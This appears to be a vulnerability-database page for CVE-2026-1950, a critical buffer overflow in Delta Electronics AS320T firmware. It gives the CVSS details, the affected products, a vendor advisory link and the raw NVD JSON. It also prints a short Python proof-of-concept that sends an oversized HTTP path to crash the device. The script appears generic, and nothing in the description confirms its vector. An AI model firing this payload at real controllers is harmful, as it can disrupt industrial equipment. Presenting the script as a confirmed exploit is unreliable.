Security Vulnerability Report
中文
CVE-2026-1950 CVSS 9.8 CRITICAL

CVE-2026-1950

Published: 2026-04-24 07:16:09
Last Modified: 2026-05-11 17:42:40
Source: 759f5e80-c8e1-4224-bead-956d7b33c98b

Description

Delta Electronics AS320T has No checking of the length of the buffer with the file name vulnerability.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:deltaww:as320t_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:deltaww:as320t:-:*:*:*:*:*:*:* - NOT VULNERABLE
Delta Electronics AS320T (具体版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import sys # Target IP and Port (Example) TARGET_IP = "192.168.1.100" TARGET_PORT = 80 # Vulnerability trigger: Buffer overflow via long filename # Padding to crash the service or overwrite return address buffer = "A" * 500 header = "GET /" + buffer + " HTTP/1.1\r\n" header += "Host: " + TARGET_IP + "\r\n\r\n" def send_exploit(): try: print("[+] Sending exploit payload to %s:%d..." % (TARGET_IP, TARGET_PORT)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_IP, TARGET_PORT)) s.send(header.encode()) s.close() print("[+] Payload sent successfully.") except Exception as e: print("[-] Error: %s" % e) if __name__ == "__main__": send_exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1950", "sourceIdentifier": "759f5e80-c8e1-4224-bead-956d7b33c98b", "published": "2026-04-24T07:16:08.523", "lastModified": "2026-05-11T17:42:40.187", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Delta Electronics AS320T has \nNo checking of the length of the buffer with the file name vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:deltaww:as320t_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.16", "matchCriteriaId": "BC2A0FA6-0941-49B4-BBDD-D4D7E886D4E6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:deltaww:as320t:-:*:*:*:*:*:*:*", "matchCriteriaId": "207554E0-1FF1-4F4A-AE19-C8F77D3A38D9"}]}]}], "references": [{"url": "https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2026-00006_AS320T%20Multiple%20vulnerabilities%20(CVE-2026-1949,%201950,%201951,%201952).pdf", "source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "tags": ["Vendor Advisory"]}]}}